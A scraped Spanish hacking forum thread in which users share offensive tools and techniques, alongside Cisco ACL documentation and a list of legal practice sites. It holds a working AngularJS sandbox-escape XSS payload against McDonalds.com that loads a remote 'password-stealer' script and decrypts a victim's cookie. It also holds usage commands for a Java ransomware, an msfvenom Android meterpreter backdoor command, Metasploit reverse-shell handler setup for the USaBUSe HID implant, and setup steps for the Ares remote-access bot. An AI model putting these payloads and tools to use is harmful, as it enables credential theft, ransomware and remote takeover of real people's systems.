Buenas yo queria aportar lo que en su dia recolecte un pequeño esquema acerca de la recogida de informacion.
Tambien te recomiendo que leas You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

• Recopilacion informacion
• Determinacion de rangos de red
• Identificacion de maquinas activas
• Encontrar puertos abiertos y puntos de acceso
• Fingerpriting de los OS
• Figertrinting de servicios (Versiones y actualizaciones)
• Delineado de red (Mapeo de red,topologia de red)

Interno: Se lleva acabo teniendo acceso a la red interna
Externo: Se lleva acabo desde fuera de la organizacion

• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• Social Network Enginnering
• Fuentes publicas

Recuerda que puedes usar You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login   (herramienta a buscar) para buscar herramientas que viene en kali linux instaladas y obtener informacion.

• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• Uso de ingenieria social ( preguntas al administrador de sistemas, las personas que se encargan de la administracion de la empresa como los gerentes etc..)
• Mapeo de red (identificar routers, firewalls)

• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

El servidor DNS nos puede dar informacion acerca de:

• Nombre del servidor
• Funciones del servidor
• Direcciones IP

---

fuente:backtrackacademy

Buenas a todos y a todas, aqui rafa mora, queria compartiros esta herramienta



Universal Serial aBUSe es un proyecto lanzado en la Defcon 24 por Rogan Dawes. El equipo tuvo algunos ataques bastante comunes (teclados falsos en pequeños dispositivos USB que escriben cosas desagradables) y los extendió a proporcionarnos un canal binario bidireccional sobre nuestra propia red wifi para darnos acceso remoto independiente de la red del host. Esto nos da varias mejoras con respecto a los ataques de estilo tradicional "Rubber Ducky".

-Podemos desencadenar el ataque cuando queremos.
-No utilizamos la red del anfitrión. Sin problemas en exfil, o potencial para la captura de NIDS.
-Un montón de trabajo se pueden mover al hardware, lo que da menos para cosas como AV para activar o equipos DFIR de encontrar.
-No se muestra como un adaptador de red, nuestra tubería binario es un dispositivo inocuo, por lo que es más difícil de detectar.


-Utiliza un raton jiggler para evitar que el protector de pantalla se active (pero sin ningún movimiento visible del ratón)
-Las cargas útiles optimizadas se ocultan de un usuario en su activación de 4s
-La capacidad para integrar tu payload favorito.


Este repositorio tiene una serie instrucciones y código para construir el firmware y el software de.Comenzamos descargando el proyecto de github.

git clone --recursive https://github.com/sensepost/USaBUSe

Si desea ejecutar sólo los ataques, entonces no es necesario clonar todos los submódulos. La última versión ( You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login ) tendrá firmware precompilado. Después solo necesitas:

-esptool para actualizar el firmware
-vncdotool para ejecutar la interacción automatizada en el cliente.
-los scripts de este repositorio para las cargas útiles.

cd vncdotool

python setup.py install

ACLARACION: vncdotool solo es compatile con Python2.7

vncdo -s esp-link.lan -p password type "echo hello" key enter

Un ejemplo mas completo

vncdo -s esp-link.lan -p password key alt-r pause 1 type powershell key enter pause 1 typefile powershell/read_exec.ps1

Si esp-link.lan no resuelve, busque el puerto 23 y 5900 en la red local, o consultar su servidor DHCP.

La interacción con la interfaz HID genérico requiere que el código del lado víctima encontrada bajo el powershell / directorio, así como el código del lado del atacante que se encuentra en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.

Una demostración de un completo, ataque de extremo a extremo se puede encontrar en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

En resumen, la forma en que funciona es que el atacante usar VNC para escribir a máquina una carga útil stage0 (utilizando actualmente PowerShell), que tiene sólo inteligencia suficiente para abrir el canal de mayor ancho de banda (en la actualidad sólo HID Genérico se implementa), y la carga y ejecutar una carga útil stage1 más complicado. Hay un par de cargas útiles stage1 implementado actualmente:

-spawn.ps1 - cmd.exe Ejecutar, y el tubo de salida estándar / stderr sobre el dispositivo, mientras que la lectura del dispositivo, y la escritura que a la entrada estándar del proceso.
-screenshot.ps1 - tomar una captura de pantalla del escritorio, y enviarlos a través del dispositivo.
-msf_proxy.ps1 - abrir un socket TCP en localhost: 65535, y la retransmisión de datos de ida y vuelta sobre el dispositivo. En un hilo separado, invocar el paso del cargador Metasploit, la conexión a localhost: 65535. Esto se puede utilizar para ejecutar un msfconsole ventanas / cáscara / reverse_tcp o incluso (con un poco de paciencia!) Una completa ventanas / meterpreter / reverse_tcp.

La paciencia es necesaria debido a que el dispositivo USB no tiene particularmente alto ancho de banda. HID Genérico se limita a 64 KB / s, y la UART entre los dos microprocesadores se limita a 250kbps (25KBps), pero otras limitaciones (muchos de ellos probablemente debido a la aplicación ingenua!) Nos limitar aún más! Actualmente, estamos alcanzando aproximadamente 4KBps.

Parches para mejorar la velocidad (y cualquier otro aspecto del sistema) son bienvenidos!

Una vez que la carga útil básica stage0 ha sido escrito a máquina a través de VNC, la segunda etapa se envía a través de la interfaz genérica HID (sólo la aplicación en la actualidad).

read_exec.ps1 espera recibir la próxima etapa en el siguiente formato:

<stage length high byte><stage length low byte><powershell stage>

El script de shell incluidos You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login se encarga de este proceso para usted.

¡Nota! Hay un sueño importante incluida entre el envío de la segunda etapa, y la conexión de la toma de corriente al punto extremo final (msf, etc). La razón de esto es que la segunda etapa puede no terminar en un límite de 63 bytes, y si el punto final empieza a enviar los datos antes de tiempo, algunos de los que los datos pueden terminar "lleno" en el espacio vacío en el último paquete de la stage2 carga útil. Actualmente, el cargador stage0 no tiene ningún mecanismo para mantener estos datos para su uso posterior en la segunda etapa, y es descartado. La introducción de un sueño se asegura de que todos los datos desde el punto final no se llenan con la carga útil stage2, y evita la corrupción de datos.


El guión You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login actual espera conectar a un oyente que se ejecuta en el puerto 4444 en el servidor local. Exactamente qué tipo de detector que debe ser depende de la secuencia de comandos stage1 que se envió. Si envía spawn.ps1, el oyente puede ser un simple "nc -l -p 4444". Si va a enviar msf_proxy.ps1, el oyente debe ser un msfconsole debidamente configurado. Usted puede elegir su carga útil como desee, de entre el grupo de cargas útiles que hacen uso de una conexión por etapas / reverse_tcp.

Por ejemplo:

./msfconsole
use exploit/multi/handler
set payload windows/shell/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
exploit

NOTA:No establezca LHOST a 127.0.0.1, se trata de un "número mágico" interno utilizado por Metasploit para sus propios fines. Las cosas se rompen al azar si lo hace! xDD


OS X también puede obtener el compilador AVR mediante la instalación de la aplicación Arduino, por ejemplo Caskroom / barril / Arduino

Linux puede instalar usando apt-get:

sudo apt-get install gcc-avr avr-libc avrdude

Una vez instaladas las herramientas de avr y avr-gcc está en su PATH, compilar los firmwares avr

cd avr
make

Esto debe construir dos firmwares, Program_ESP y KeyboardMouseGeneric. es decir, debe tener archivos .hex en cada directorio.


Una vez que el clon recursiva ha completado, la construcción de la SDK-esp-abierta (asegúrese de que la construcción de la versión independiente!). usuarios de OS X FAVOR que este paso se debe realizar en un sistema de archivos entre mayúsculas y minúsculas!

  cd esp-open-sdk
  make STANDALONE=n

Una vez que el SDK-esp-abierto ha recopilado, en el directorio de nivel superior, hacer:

wget --content-disposition "http://bbs.espressif.com/download/file.php?id=1046"

 unzip ESP8266_NONOS_SDK_V1.5.1_16_01_08.zip

Si tienes OS X, es probable que necesites instalar GNU sed, y asegúrese de que está en su PATH. Una manera fácil de hacer esto es usar Homebrew:

brew install gnu-sed

export PATH="/usr/local/opt/gnu-sed/libexec/gnubin:$PATH"

Como alternativa, para garantizar que siga siendo accesible después de que finalice la sesión, y para evitar errores extraños en futuras versiones, agregarlo a su perfil de golpe.

Si se encuentra con esto, asegúrese de ejecutar "make clean" para eliminar los artefactos rotos, antes de tratar de construir de nuevo.
En esta etapa, usted debe ser capaz de cambiar al directorio esp-VNC, y ejecutar make para construir el firmware ESP8266.

 cd esp-vnc
 make

Descargar la herramienta You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

---

fuente:n0where.net

---

Un saludo biachees

Buenas queria compartiros esta herramienta llamada Sublist3r.



Sublist3r es herramienta desarollada en python que está diseñado para enumerar los subdominios de sitios web a través de diversas fuentes de OSINT. Ayuda en lasa pruebas de penetración a recoger y reunir los subdominios del dominio que se dirigen. Sublist3r soporta varios motores de búsqueda como Google, Yahoo, Bing, Baidu, y Ask. Más motores de búsqueda se pueden añadir en el futuro. Sublist3r también recopila subdominios utilizando Netcraft, VirusTotal, ThreatCrowd, DNSdumpster y PassiveDNS.

subbrute se integró con Sublist3r para aumentar la posibilidad de encontrar más subdominios utilizando fuerza bruta con una lista de palabras mejorada.


Descargamos la herramienta de github


Deberemos instalar las dependencias: argparse,dnspython,requests.Para ello ejecutamos el siguiente comando.

pip install -r requirements.txt

                     OPCIONES

-d   --domain           Especificar el nombre del domino
-b   --bruteforce   Habilitar el modo subbrute force
-p   --ports           Analizar los subdominios que se encuentra en un determinado puerto
-v   --verbose           Activa el modo detallada y lo visualiza en tiempo real
-t   --threads           Numero de hilos para subbrute force
-e   --engines           Especifica los motores de busqueda
-o   --output           Guarda los resultados en un archivo
-h   --help           Muestra el menu de ayuda

---

Quizas os sirva a alguno Un saludo biachees :O 

Haciendo referencia al You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login destacamos una tecnica llamada anti-spoofing.

Las ACLs pueden ser utilizadas para mitigar amenazas en la red como ataques de suplantacion de direcciones IP y ataques de denegacion de servicio (DoS).

La mayoria de los ataques usan algun tipo de suplantacion, la suplantación de direcciones IP anula el proceso normal de creación de paquetes insertando en un encabecero IP
personalizado con una dirección IP de origen diferente.

Hay muchas clases conocidas de direcciones IP que nunca deben ser vistas como direcciones IP de origen para el tráfico que ingresa a la red de una organización.

Por ejemplo, en la imagen, la interfaz S0/0/0 está conectada a Internet y nunca debe aceptar paquetes entrantes desde las siguientes direcciones:

-Todas las direcciones 0.0.0.0
-Direccion de broadcast
-Local host (127.0.0.1/08)
-Rangos multiples de IP(224.0.0.0/4)


La red 192.168.1.0/24 está conectada a la interfaz R1 G0 / 0. Esta interfaz sólo debe permitir que los paquetes entrantes con una dirección de origen de esa red. La ACL para G0 / 0 que aparece en la figura sólo permitirá paquetes entrantes de la red 192.168.1.0/24. Todos los demás serán descartados.

---

documentacion:cisco

---

Las ACL(listas de control de acceso) son usadas en las redes para prevenir ataques y controlar el trafico de la red.
Los sysadmin pueden utilizar ACLs para definir y controlar el trafico de los dispositivos que están en la red para intentar securizarlos.

Las ACLs pueden ser definidas mediante un numero, ese numero dispone de un rango entre 200-299 que sera usado para controlar el trafico según el tipo Ehernet.El rango entre 700-799 deberá indicar como esta clasificado el trafico mediante su dirección MAC.


Una ACL es una lista de sentencias que permiten o deniegan un estado,conocido como entradas de control de acceso(ACEs).
Las ACEs pueden ser creadas para filtrar trafico basándose en ciertos criterios como: la dirección de destino, la dirección de origen, el protocolo y el numero de puerto.

Las ACLs Estandars marcan los paquetes examinando la dirección IP de la cabecera IP del paquete.
Aquellas ACLs son usadas para filtrar paquetes basados tan solo en la información de la capa 3.Para configurar un numero de una ACL Estandar lo haremos mediante el siguiente comando.

access-list (acl-#) ([b]permit[/b] | [b]deny[/b] | [b]remark[/b]) source-addr (source-wildcard) [b]log[/b]

           Parámetro                           Descripción

-acl-#                       Esto es un numero decimal entre 1 y 99, o 1300 a 1999   
-deny                        Deniega el acceso si las condiciones  están marcadas
-permit                     Permite el acceso si las condiciones están marcadas 
-remark                    Agregar un comentario sobre las entradas en una lista de acceso IP para hacerlas mas fáciles de entender y escanear.

-source-addr         Numero de red o de host el cual el paquete sera enviado.
-source-wildcard   (opcional) 32-bit mascara wildcard sera aplicado en el origen.
-log                     (opcional) Recoge informacion sobre los mensajes de logging.

Las ACLs Extendidas marcan los paquetes basandose en la informacion de las capas 3 y 4 de origen y destino.
La Capa 4 puede incluir protocolos de informacion como TCP y UDP. Las ACLs Extendidas proporcionan gran flexibilidad y control sobre el acceso a una red mas que las ACLs Estandars. Para configurar un numero de una ACL Extendida usaremos el siguiente comando.

access-list acl-% ([b]permit | deny | remark[/b]) protocol source-addr (source-wildcard) dest-addr (dest-wildcard) (operator port) [b]established[/b]

           Parámetro                           Descripción

-acl-#                       Esto es un numero decimal entre 1 y 99, o 1300 a 1999   
-deny                        Deniega el acceso si las condiciones  están marcadas
-permit                     Permite el acceso si las condiciones están marcadas 
-remark                    Agregar un comentario sobre las entradas en una lista de acceso IP para hacerlas mas fáciles de entender y escanear.
-protocol                     Nombre o numero de un protocolo.
-source-addr               Numero de red o de host el cual el paquete sera enviado.
-source-wildcard          Bits de la wildcard seran aplicados a la direccion de  origen
-destination-adrr         Numero de la red o host el cual el paquete sera enviado
-destination-wildcard   Bits de la wildcard seran aplicados a la direccion de destino

-operator                    (optional) Compara el origen o direccion de los puertos. Incluye posibles operandos como lt (menor que) gt (mayor que) eq (igual) neq (no igual) and range (incluyendo un rango).
-port                            (optional)Numero de puerto o nombre de un puerto TCP o UDP
-established                  (optional)


En lugar de utilizar un número, se puede utilizar un nombre para configurar una ACL.Para configurar una ACL estandar o extendida usaremos el siguiente comando.


Router(config)#

[b]ip access-list (standard | extended)[/b] nombre_de_la_ACL

Router(config-std-nacl)#

([b]permit | deny | remark[/b]) (source (source-wildcard) | [b]any)[/b]

Router(config-ext-nacl)#

 (permit | deny | remark) protocl source-addr (source-wildcard) dest-address (dest-wildcard) (operator-port)

---

documentacion:cisco

---

McDonalds.com contiene una página de búsqueda que refleja el valor del parámetro de búsqueda ( q) en la fuente de la página. Así que cuando buscamos en la ***********-test-reflected-test-***********que se verá así:


Enlace utilizado:

 https://www.mcdonalds.com/us/en-us/search-results.html?q=***********-test-reflected-test-***********

McDonald utiliza AngularJS para que podamos tratar de imprimir el ID de ámbito único usando el valor de búsqueda. Podemos hacer esto cambiando el qvalor del parámetro a {{$id}}. Como podemos ver {{$id}}consigue convertido a 9la ID única (monótonamente creciente) del alcance AngularJS.


Enlace utilizado:

 https://www.mcdonalds.com/us/en-us/search-results.html?q={{$id}}

Utilizando {{alert(1)}}como valor no funcionaría porque todo el código AngularJS se ejecuta en un entorno limitado. Sin embargo, la caja de arena AngularJS no es muy seguro. De hecho, no se debe confiar en absoluto. Llegó incluso eliminado en la versión 1.6 ( fuente ) porque le dio una falsa sensación de seguridad. PortSwigger creado un buen post sobre escapar de la caja de arena AngularJS ( enlace ).

Primero tenemos que encontrar la versión de AngularJS You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login. Podemos hacer esto mediante la ejecución angular.versionen la consola.


La versión es 1.5.3, por lo que la caja de arena de escape que necesitamos es

{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}

. Podemos utilizar este escape caja de arena como valor de búsqueda, lo que resulta en una alerta.


Incluso podemos cargar archivos JavaScript externos utilizando la siguiente caja de arena de escape, lo que da lugar a la alerta a continuación.

{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=$.getScript(`https://finnwea.com/snippets/external-alert.js`)');}}`

El código JavaScript se puede cargar desde otro dominio desde McDonalds no excluye que el uso de la Content-Security-Policycabecera.



Otra cosa que me di cuenta en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login era su cartel en la página que contenía una casilla muy especial. Normalmente se puede comprobar "Recuérdame" en el momento de firmar, pero de signo de McDonald en la página nos da la opción de recordar la contraseña.


He buscado en todo el JavaScript de la palabra clave passwordy me encontré con algo de código interesante que descifra la contraseña.


Si hay una cosa que no debe hacer, es descifrar contraseñas lado del cliente (o incluso almacenar contraseñas mediante el cifrado de dos vías).

Traté de ejecutar el código de mí mismo, y funcionó!


McDonald utiliza CryptoJS para cifrar y descifrar datos sensibles. Utilizan el mismo keyy ivpara todos los usuarios, lo que significa que sólo tengo que robar la penccookie para descifrar la contraseña de alguien.


He intentado descifrar la contraseña en la página de búsqueda usando una carga útil maliciosa de búsqueda, pero no funcionó. De alguna manera, las cookies no contienen caracteres ocultos en la página de búsqueda haciendo que el getCookiemétodo falle. El getCookiemétodo intenta recortar espacios en blanco de los valores de cookie. En las imágenes se puede ver a continuación .charAt(0)devuelve una cadena extraña cuando se ejecuta en la página de búsqueda.


Escribí algo de JavaScript que carga la página en un iframe y le quita la cookie de ese iframe.

if (!window.xssIsExecuted) {
    window.xssIsExecuted = true;

    var iframe = $('<iframe src="https://www.mcdonalds.com/us/en-us.html"></iframe>');
    $('body').append(iframe);

    iframe.on('load', function() {
        var penc = iframe[0].contentWindow.getCookie('penc');
        alert(iframe[0].contentWindow.decrypt(penc));
    });
}

Ahora podemos utilizar la siguiente caja de arena de escape, lo que se traduce en mi contraseña en un cuadro de alerta!

{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=$.getScript(`https://finnwea.com/snippets/mcdonalds-password-stealer.js`)');}}

---

fuente:finnwea.com

---

Un saludo biachees

Hay diferentes tipos de ransomware. Sin embargo, todos ellos se evitará el uso de su PC normalmente, y todos ellos le pedirá que hacer algo antes de poder utilizar su PC. Ellos pueden dirigirse a cualquier usuario de PC, ya sea un ordenador personal, los puntos finales en una red de empresa, o los servidores utilizados por una agencia gubernamental o profesional de la salud. Ransomware puede:

-Impedir el acceso de Windows.

-Cifrar archivos por lo que no pueden utilizarlos.

-Detener ciertas aplicaciones se ejecuten (como el navegador web).

Ransomware exigirá que pague el dinero (un "rescate") para tener acceso a su PC o archivos. También hemos visto que te hagan encuestas completas. No hay garantía de que el pago de la multa o hacer lo que el ransomware dice qué le dará acceso a su PC o archivos de nuevo


Este proyecto tiene como objetivo construir un cripto-ransomware casi funcional para propósitos educativos, escrito en Java puro. Básicamente, se cifrará sus archivos en segundo plano usando un algoritmo AES-256, un fuerte algoritmo de cifrado, utilizando RSA-4096 de clave pública para asegurar la clave AES Symetric y almacenarla en una base de datos embeeded.

El software malicioso cifrar con la clave pública RSA-4096 antes de enviar cualquier carga útil a continuación, al servidor. Este enfoque con el transporte https juntos hacen la seguridad y la autenticación casi irrompible (en teoría).


La forma más fácil de ejecutar este proyecto es utilizar el del .jar abrir un terminal cmd y sólo tiene que ejecutar los siguientes comandos

 $ cd JarPath

Cifrar todos los archivos

$ java -jar JavaRansomware.jar C:\Users Encrypt

Descifrar todos los archivos

$ java -jar JavaRansomware.jar C:\Users Decrypt

Puedes descargar el proyecto You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

---

Un saludo:)

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hola @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

¿Quizás falten librerías de Python?, digo quizás te falte alguna (que se yo, uno nunca sabe) yo el otro día probé un .py y me faltaba instalar algunas que eran necesarias por temas de conexiones, geo localizaciones, proxys, etc... veamos si estas te pueden servir (ojalá así sea), sino pasa nada, seguiremos buscando soluciones para llegar al problema. ¡No lo dudes!

sudo apt-get install python-pycurl python-geoip python-crypto

Un abrazo fraternal camarada, veamos que tal va todo mi buen amigo.

Camarada? JAJAJAJAA bueno tio se que sos buen chaval y llegaras lejos si sigues asi yo confio en ti ademas sos un tipo majete pero al menos si has tenido la decencia de leerte mi post podras observar que la tool la estoy instalando en windows por lo que ese comando no me sirve

Mira a ver si sos capaz de instalar la tool se llama Webxploit y el fallo radica como tu dices a la hora de buscar un modulo de python

Un saludo pequeñajo

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
instalaste urllib?

si, esta en las librerias

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Gracias por el aporte, tendras ese lab que usas en la imagen?, para realizar pruebas xD

Cuando dices lab te refieres al laboratorio? Si es asi es un taller que esta en el foro,busca taller xss en el foro yo he usado ese escenario para probar la herramienta


Enviado desde mi HUAWEI SCL-L01 mediante Tapatalk

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Bueno, mi problema es que al crear un backdoor para android (.apk) con el siguiente comando en la terminal de kali linux (VMWare Station) msfvenom -p android/meterpreter/reverse_tcp LHOST= Ip de ifconfig LPORT=5555 > virusdeprueba.apk

Hasta ahí todo bien, luego descargo el .apk en mi dispositivo móvil conectado a la misma red, por lo que no creo que haya que abrir puertos, antes de eso me voy a msfconsole y configuro todo usando multi/handler con el payload, lport y lhost y le pongo exploit, luego abro la apk y no me sale ninguna sesión , además la apk pasa a llamarse MainActivity con el robot verde de android como icono

Si hay que abrir puertos ensenme como abrirlos pls

la APK que creas tiene una conexion muy poco inestable, yo realiza la prueba hace bastante ya y la conexion se perdia a los pocos segundos,al estar en local no hace falta que abras los puertos.
Te dejo un par de links a ver si te pueden ayudar

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Linux Kodachi es un sistema operativo basado en Debian 8.6 con un escritorio ligero XFCE que pretende ser lo más seguro, anti-forense y anónimo posible, siendo a la vez muy fácil de usar. Todo lo que hay que hacer es arrancarlo mediante una unidad externa (dispositivo USB, tarjeta SD o CD/DVD) y tendremos un sistema operativo funcionando con conexión VPN + conexión Tor y servicio DNScrypt. En principio no requiere ninguna configuración o conocimiento de Linux.


El sistema operativo se carga en RAM por lo que una vez que se apague el PC no se dejará ningún rastro eliminado todas las actividades del usuario.
Es libre bajo licencia Apache License 2.0 y de código abierto y sus características principales son:

- VPN, Tor y DNScrypt.
- Truecrypt
– keepass
– Secure cloud y mucho más
- Generador de direcciones MAC aleatorias
- RAM Wiping en el reinicio/apagado
- Navegador Tor
- Pidigin Messenger
- Carteras Bitcoin y Litecoin
- Opciones multi-DNS
- Truecrypt/VeraCrypt
- Peer Guardian
- Información del sistema y de la seguridad en el escritorio

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login:  (usuarios por defecto: kodachi y root, contraseña: r@@t00)
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

---

fuente:hackplayers.com

Un saludo

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Prueba a ejecutarlo con Python3

Si lo ejecuto con python3 me tira otro error:" File "WebXploiter.py", line 3, in <module>
    import argparse
ImportError: No module named argparse"

---

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Encontré una posible solución

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos

Buenas stiu,yo creo que fue la primera pagina que visite y me mando aqui You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login pero nada tio no lo entiendo, no por el idioma si no porque no lo consigo comprender, entiendo que para la ejecucion de la herramienta importa los modulos y librerias desde python, busque dentro del dir de python y estaban librerias llamadas, incluso alguna la tuve que instalar, hay cosas sencillas que haces un pip install nombredeladependecia y ya esta listo, pero aqui con el error del modulo no se que narices pasa.

Ya os digo no lo entiendo

Buenas queria compartir esta herramienta llamada BruteXSS.



Es una herramienta la cual nos permite identificar vulnerabilidades XSS mediante una ataque de fuerza bruta que lo implementa en un diccionario, en ese diccionario nosotros podremos añadir mas vectores para el futuro escaneo,implementa los parametros POST y GET.
La herramienta la podreis encontrar You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


-XSS fuerza bruta
-Escaneo XSS
-Soporta peticiones GET / POST
-Personalizar wordlist
-Intefaz facil de usar


-Python 2.7
-Diccionario (wordlist.txt)
-Módulos necesarios: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login,You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

---

Un saludo

Buenas gente estaba tratando de instalar una herramienta llamada webxploiter para poder compartirla con ustedes pero parece ser que soy incapaz


He buscado por google el error y nada no soy capaz de ponerla en funcionamiento ya que siempre me arroja el mismo error, se lo comente a un chico del grupo y me dijo que probara en linux, me fui a kali, y bueno peor aun me saltaron mas errores

La herramienta tiene un archivo que para instalarla la herramienta y hacerla funcionar hay que ejecutar el script, pero yo obviamente no podia instalarlo de esa manera porque lo estaba realizando en windows, asique fui a instalar las dependencias y requerimientos manualmente


Me parece una tool interesante si alguien se anima y la prueba a instalar por su cuenta o me puede ayudar con el error le estare agradecido

Un saludo

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Muy buen video la verdad, a pesar de ser largo merece la pena. En cuanto a la deep web es verdad que perturba muucho... Si vas, haz lo que tengas que hacer y ya esta. Y una pregunta ¿Que me decís de esos vídeos de Youtube en los que la gente afirma haber estado navegando por ella y haber llegado al "nivel 6" y ser avisados por alguien? Tipo sabemos donde vives, no sigas. O se les apague el ordenador y al reiniciarse encontrarse con un mensaje. Yo no se que decir a esto la verdad.
Saludos y feliz 2017 a todos 

Enviado desde mi ALE-L21 mediante Tapatalk

Creo que si te te pregunto ¿Santa Claus existe?
Eso podra responder a tu pregunta

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Cita "Probando de nuevo, CMSmap parecía realizar el ataque de fuerza bruta correctamente, asique modifiqué el código para añadir la password, ya que no se hace mediante un diccionario externo."

No entiendo muy bien esa parte, que parte modificaste?

Supongo que lo que hizo fue añadir al diccionario que usa CMSmap las credenciales del propio usuario en este caso HATI:password, o crear un diccionario, vamos un simple txt

Buenas queria compartir estos 10 sitios donde practicar hacking.


Este conjunto de laboratorios se destaca por su realismo: no son solo excelentes desafíos, sino que sus escenarios son muy similares a los que podemos encontrar en un entorno corporativo. En Pentestit la conexión se realiza a través de una VPN y está limitado de forma gratuita a algunos pocos niveles o vulnerabilidades. Sin embargo, si estás pensando en certificar algún curso de ethical hacking práctico o te dedicas a las auditorías de seguridad de manera profesional, quizá puedas invertir cierto dinero para reforzar tus conocimientos.



Bautizado por sus siglas provenientes de World Wide Web Challenges, este portal ofrece desde 2010 diversos desafíos con temáticas relacionadas a hacking, wargames, forense, criptografía y programación. Curiosamente, también te desafían a hackear su propio sitio, pero sin aplicar técnicas de fuerza bruta o Denegaciones de servicio. Soporta dos idiomas: inglés y francés.



Este portal cuenta con más de 200 retos y 1650 soluciones para ponerte a prueba. Como se puede ver en la siguiente captura, podrás entrenarte en distintos desafíos de seguridad y en español, entre otros idiomas disponibles. Según los creadores de Rootme, ya han superado los 68.000 estudiantes y muchos de ellos participan diariamente de las comunidades formadas para cada tópico, por lo que podrán ser de gran ayuda.



Posee múltiples escenarios como Bandit, Natas y Narnia, entre otros con distintos obstáculos. Algo que llama curiosamente la atención de OverTheWire es que si eres novato en este submundo de las auditorías de seguridad informática encontrarás varios escenarios diseñados para ti.



Este sitio también te permite probar herramientas o conocimientos de hacking de manera gratuita y legal. Además, Hackthissite ofrece una comunidad activa en donde se desarrollan distintas temáticas relacionadas: hay desafíos de aplicaciones, programación, forense e inclusive de estenografía.



Ofrece desafíos del tipo CTF desde su plataforma, en la que cualquiera puede participar; solo hace falta registrarse con una cuenta gratuita, configurar una VPN y comenzar a explorar lo que ofrecen. La meta de Hacking-Lab es aumentar la concientización hacia una mayor educación y ética en la seguridad de la información a través de distintos desafíos que abarcan informática forense, criptografía, ingeniería inversa y, por supuesto, hacking ético.



Este portal provee cinco escenarios virtuales, documentación y desafíos que pueden utilizarse para aprender sobre explotación de vulnerabilidades. Testeando escalamiento de privilegios, análisis de vulnerabilidades, desarrollo de exploits, depuración e ingeniería inversa deberás avanzar sobre los desafíos que propone Exploit-exercises.



Esta gran plataforma te permitirá sumar determinada cantidad de puntos resolviendo escenarios muy distintos y con un variable grado de dificultad. Además, en Hack This podrás encontrar artículos, foros y un chat para conseguir una cálida ayuda en caso de que lo necesites.



Ya desde 2003 Enigma Group trabaja sobre la concientización de seguridad en aplicaciones web, por lo cual podrás probar todo tipo de vulnerabilidades del top ten de OWASP. Sin embargo, como ves en la siguiente imagen, existen muchos otros escenarios posibles. También encontrarás muchas guías de estudio y bases de datos de exploits o hashes.



Además de contener múltiples desafíos en bastas categorías, el portal You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login te desafía a que puedas sociabilizar con otros colegas o curiosos que disfrutan tanto como tú de la seguridad informática.

---

fuente:welivesecurity.com

Buenas gente os queria compartir aqui al amigo Ares


Ares es una herramienta de acceso remoto compuesta por un panel de control donde podremos interaccionar con los bots.
El cliente es un programa escrito en python el cual puede ser compilado como un ejecutable win32 usando You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

git clone https://github.com/sweetsoftware/Ares 

Una vez descargado el repositorio pasaremos a instalar las dependecias

Citarpip install pythoncom
pip install pyhook
pip install PIL
pip install requests

A continuacion configuraremos el agente de la manera que queramos, You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Nos dirigimos a la ruta Ares/agent/python/settings.py


Este fichero contiene lo siguiente:

-SERVER_URL = URL del servidor http
-BOT_ID = el nombre (singular) del bot
-DEBUG =  imprimir mensajes de depuración en la salida estándar
